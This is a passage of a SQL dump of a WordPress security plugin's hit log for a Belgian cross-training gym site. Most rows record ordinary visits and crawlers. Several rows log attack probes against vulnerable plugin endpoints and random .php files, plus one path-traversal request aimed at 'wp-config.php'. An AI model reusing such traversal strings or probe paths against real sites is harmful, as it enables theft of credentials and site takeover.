(71427, 1493919682.303849, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71428, 1493919682.824890, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71429, 1493919683.283581, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71430, 1493919683.762598, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71431, 1493919684.861768, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71432, 1493919685.314728, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71433, 1493919685.784042, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71434, 1493920047.353641, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71435, 1493920047.935367, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71436, 1493920048.483728, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71437, 1493920048.999017, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71438, 1493920049.584288, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71439, 1493920050.120704, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71440, 1493920050.587359, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71441, 1493923693.072909, 2303379820, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71442, 1493925993.600079, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/'),
(71443, 1493925998.722670, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/'),
(71444, 1493927248.362864, 1123633555, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71445, 1493927249.357209, 1123633555, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71446, 1493932850.721052, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71447, 1493933202.340305, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/'),
(71448, 1493933264.323371, 856631529, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://pizza-tycoon.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(71449, 1493939230.434551, 786801763, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(71450, 1493939731.825870, 2760155459, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71451, 1493948115.171560, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/ghfhvvaw.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71452, 1493951707.187299, 2637637377, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71453, 1493952264.675038, 532202074, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.01.58 (KHTML, like Gecko) Chrome/57.4.9910.4747 Safari/534.41'),
(71454, 1493952266.699065, 532202074, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.01.58 (KHTML, like Gecko) Chrome/57.4.9910.4747 Safari/534.41'),
(71455, 1493952267.662746, 532202074, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/?author=2', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.01.58 (KHTML, like Gecko) Chrome/57.4.9910.4747 Safari/534.41'),
(71456, 1493953489.931554, 3652617241, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71457, 1493955057.727593, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71458, 1493955416.556780, 3024883593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71459, 1493959242.741295, 3472744462, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(71460, 1493959243.555587, 3472744462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(71461, 1493959244.116409, 3472744462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(71462, 1493959244.574594, 3472744462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(71463, 1493969616.747359, 3339975108, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71464, 1493969617.272103, 3250575437, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71465, 1493969620.441902, 3250575437, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71466, 1493969626.250608, 3339975108, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71467, 1493969626.702858, 3250575437, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71468, 1493969672.278537, 3339975108, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71469, 1493969672.754000, 3250575437, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71470, 1493969750.461623, 3250575437, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71471, 1493979267.257477, 3242976508, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjR4Y-6wtjTAhUHKcAKHcJhAqMQFggjMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(71472, 1493981016.128493, 3652617388, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71473, 1493984312.718466, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/hivcxa.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71474, 1493992318.148294, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71475, 1493995001.674861, 676177851, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71476, 1493996479.605257, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71477, 1493996480.101160, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71478, 1493996480.553580, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71479, 1493996481.347309, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71480, 1493996482.107802, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71481, 1493996482.530749, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71482, 1493996482.940608, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71483, 1493996483.373215, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71484, 1493996483.769306, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71485, 1493996484.192374, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71486, 1493996484.917952, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71487, 1493996485.676268, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71488, 1493996486.171827, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71489, 1493996486.735660, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71490, 1494002177.381814, 2961112076, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/woocommerce-catalog-enquiry/lib/jquery/upload/media-upload.js', 'http://www.crossfitpampa.com/wp-content/plugins/woocommerce-catalog-enquiry/lib/jquery/upload/media-upload.js', 'Mozilla/5.0 (Windows  U  Windows NT 6.0  en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7'),
(71491, 1494009702.473175, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71492, 1494009703.122787, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71493, 1494009703.763305, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71494, 1494009704.374830, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71495, 1494009704.824249, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71496, 1494009705.263680, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71497, 1494009705.818578, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71498, 1494009706.401214, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71499, 1494009706.878718, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71500, 1494009707.336894, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71501, 1494009707.803640, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71502, 1494010560.926244, 1538628086, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.bing.com/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(71503, 1494010562.401083, 1538628086, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(71504, 1494014744.638211, 1834501559, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/26.0.154727556 Mobile/14D27 Safari/602.1'),
(71505, 1494017986.958934, 1355389698, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71506, 1494017988.758378, 1355389698, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71507, 1494023368.685371, 3657088733, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71508, 1494028278.492859, 2637637376, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71509, 1494031963.608161, 3475901715, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71510, 1494036340.440737, 3475901859, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71511, 1494038288.008103, 676177840, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71512, 1494038288.008133, 676177840, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71513, 1494039436.906545, 1374838938, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71514, 1494039439.672645, 1374838938, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71515, 1494039522.782778, 1374838938, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71516, 1494039527.631863, 1374838938, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71517, 1494039530.588559, 1374838938, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71518, 1494039532.503626, 1374838938, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71519, 1494041291.256633, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(71520, 1494041300.967942, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(71521, 1494042623.840807, 3657088733, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71522, 1494045838.350070, 676177833, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71523, 1494049479.802663, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(71524, 1494051959.334428, 1338304237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71525, 1494056150.384537, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71526, 1494059046.699405, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/wpshop/includes/ajax.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71527, 1494060769.145906, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/awake/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71528, 1494062171.188958, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71529, 1494063693.228267, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71530, 1494065754.360026, 1338304237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71531, 1494066728.028302, 3273261686, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71532, 1494066728.592387, 3273261686, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71533, 1494066729.090205, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71534, 1494066729.597343, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71535, 1494066730.088639, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71536, 1494066730.651410, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71537, 1494066731.339832, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71538, 1494066731.782563, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71539, 1494066732.320749, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71540, 1494066732.857088, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71541, 1494066733.364530, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71542, 1494067063.122379, 3273261686, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71543, 1494067063.682625, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
